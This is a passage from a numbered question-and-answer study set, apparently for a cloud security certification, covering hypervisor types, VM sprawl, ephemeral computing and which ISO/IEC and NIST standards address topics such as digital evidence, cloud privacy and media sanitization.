It runs directly on hardware without an underlying OS, used for server virtualization.
178
What is a Type 2 hypervisor?
It requires a host OS and runs as a software layer on top of it.
179
What is VM sprawl?
The uncontrolled proliferation of virtual machines, which leads to unused and unmaintained (unpatched, unmonitored) servers that expand the attack surface.
180
What is ephemeral computing?
It allocates resources for a short time.
181
What is application virtualization?
It streams applications to the user's desktop.
182
What is machine learning?
It enables computers to learn and make predictions without explicit programming.
183
What is artificial intelligence?
It refers to computer systems performing tasks that typically require human intelligence.
184
Common criteria assurance framework.
ISO/IEC 15408-1:2009
185
The NIST standard that specifies security requirements for cryptographic modules; its annexes list the approved cryptographic algorithms and those that have been withdrawn.
FIPS 140-2 (superseded by FIPS 140-3)
186
Overview and vocabulary for cloud computing.
ISO/IEC 17788
187
Guide for collecting and identifying digital evidence.
ISO/IEC 27037:2012
188
Guide for incident investigations.
ISO/IEC 27041:2015
189
Guide for digital evidence analysis.
ISO/IEC 27042:2015
190
Principles and process for incident investigation.
ISO/IEC 27043:2015
191
Overview and process for eDiscovery.
ISO/IEC 27050-1:2016
192
Standards for cloud privacy.
ISO/IEC 27018
193
Definition for cloud computing.
NIST 800-145
194
Guide for the security requirements for the U.S. federal government information systems.
NIST 800-53
195
Guidelines for media sanitization, including cryptographic erasure.
NIST SP 800-88
196
Defines personally identifiable information (PII) and gives guidance on protecting its confidentiality.
NIST SP 800-122